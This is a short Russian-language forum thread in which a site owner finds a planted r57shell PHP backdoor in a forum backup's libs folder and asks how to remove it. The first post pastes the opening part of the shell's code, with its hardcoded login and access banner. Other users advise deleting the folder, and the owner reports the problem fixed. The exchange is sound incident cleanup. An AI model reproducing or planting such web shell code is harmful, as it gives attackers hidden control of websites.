Троян на форуме

Автор Schedrin, 31 мая 2014, 23:02:47

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Schedrin

Ничего, как говорится, не предвещало...

Форум работал отлично, никаких проявлений вредоносного кода не было, антивир никогда не жаловался, etc.
Скачал на комп бэкап форума и через час зачем-то запустил Касперского проверить диск "С"....   Оба-на - скачанный файл содержит троянскую программу! Конкретно в public_html/libs/forum_lib.php сидит Вackdoor.PHP.Rst.f.

Захожу в панель управления хостингом...  Текущий путь: /  var/  www/  мой сайт/  data/  public_html/  libs/ 
В папке libs файл forum_lib.php имеет такой код:

<?php

$language
='ru';
$auth 1
$name='blein'
$pass='psw123'
/******************************************************************************************************/
error_reporting(0);
set_magic_quotes_runtime(0);
[
at]set_time_limit(0);
[
at]ini_set('max_execution_time',0);
[
at]ini_set('output_buffering',0);
$safe_mode = [at]ini_get('safe_mode');
$version "1.24";
if(
version_compare(phpversion(), '4.1.0') == -1)
 {
 
$_POST   = &$HTTP_POST_VARS;
 
$_GET    = &$HTTP_GET_VARS;
 
$_SERVER = &$HTTP_SERVER_VARS;
 }
if ([
at]get_magic_quotes_gpc())
 {
 foreach (
$_POST as $k=>$v)
  {
  
$_POST[$k] = stripslashes($v);
  }
 foreach (
$_SERVER as $k=>$v)
  {
  
$_SERVER[$k] = stripslashes($v);
  }
 }

if(
$auth == 1) {
if (!isset(
$_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
   {
   
header('WWW-Authenticate: Basic realm="Who are you ?"');
   
header('HTTP/1.0 401 Unauthorized');
   exit(
"<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
   }
}   
$head '<!-- 


Вопрос. Что делать?  Что именно удалять?


Schedrin

Цитата: digger® от 01 июня 2014, 00:30:22
Это шелл, его и удалять.
Нужно полностью удалить всю папку libs?
Или папку оставить, но удалить находящийся в ней файл forum_lib.php?

digger®

Цитата: Schedrin от 01 июня 2014, 12:52:03
Нужно полностью удалить всю папку libs?
Или папку оставить, но удалить находящийся в ней файл forum_lib.php?
В дистрибутиве форума нет папки libs, так что она к нему вообще не относится.

Schedrin

Цитата: digger® от 01 июня 2014, 12:55:14
В дистрибутиве форума нет папки libs, так что она к нему вообще не относится.
Папку libs снес.
Сохранил бэкап - проверил Касперским - ща все ОК.
Спасибо.